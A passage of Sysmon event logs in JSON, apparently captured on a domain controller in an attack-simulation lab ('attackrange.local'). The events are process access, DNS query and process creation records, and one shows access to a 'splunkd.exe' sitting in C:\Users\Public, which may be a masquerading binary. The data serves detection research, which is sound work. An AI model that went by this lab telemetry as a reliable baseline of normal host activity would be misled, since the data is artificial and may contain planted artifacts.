06:49:28.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2383,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2384,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2385,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2386,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2387,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.755\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1078-5F25-0000-0010722A0400}\r\nTargetProcessId: 2304\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.755","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1078-5F25-0000-0010722A0400}","TargetProcessId":"2304","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2388,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.817\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.817","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2389,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.895\r\nSourceProcessGUID: {E2A3D6B1-1078-5F25-0000-0010722A0400}\r\nSourceProcessId: 2304\r\nSourceThreadId: 3516\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.895","SourceProcessGUID":"{E2A3D6B1-1078-5F25-0000-0010722A0400}","SourceProcessId":"2304","SourceThreadId":"3516","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+577205|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+576d36|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+56c09|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+572d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe+8fe2c4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2390,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:28.083\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:28.083","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"1460","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2391,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:29.432\r\nProcessGuid: {E2A3D6B1-1079-5F25-0000-00107A420400}\r\nProcessId: 3780\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: 